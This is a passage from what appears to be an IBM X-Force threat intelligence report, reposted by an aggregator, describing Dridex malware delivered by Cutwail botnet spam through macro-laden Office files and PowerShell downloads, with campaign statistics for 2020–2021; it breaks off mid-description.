IBM X-Force threat intelligence has been observing a rise in Dridex-related network attacks that are being driven by the Cutwail botnet. Dridex is delivered as a second-stage infector after an initial document or spreadsheet arrives via email with booby-trapped macros. Recipients who activate the macros unknowingly launch malicious PowerShell scripts that will download additional malware. At this time, X-Force is seeing relatively limited campaigns active in Italy and Japan.
Invoke PowerShell, Download Dridex
The initial infection vector of the attacks we are observing is malspam email. Recipients receive unsolicited messages containing Microsoft Office file attachments, often delivered via the Cutwail botnet. Cutwail itself has been a prominent spamming infrastructure in the cybercrime arena, named as the largest of its kind in 2009, and continues to spread spam for elite malware-wielding gangs in 2021.
Overall, at least 34% of all PowerShell-based attacks X-Force has seen since June 2020 were ultimately linked with a Dridex payload. The PowerShell uptick became apparent in early 2020 and started rising more considerably in May 2020.
X-Force observed activity spikes in December 2020, which accounted for an 80% increase in the overall number of malicious PowerShell attacks compared to the preceding six-month period. In January 2021, X-Force observed a sudden decline in both PowerShell attacks as well as the embedded Dridex attacks, likely as the campaign ended and a new one started using a different macro variant and other scripts.
Figure 1: PowerShell network attacks per month (Source: IBM X-Force)
Multi-Stage Infections
In the cases X-Force analyzed, PowerShell is instructed to bypass the local execution policy and then runs a Base64-encoded command, which results in a request to browse to what is supposed to appear like a Microsoft update URL. The script fetches a malicious executable file from that typo-squatted ..
Support the originator by clicking the read the rest link below.
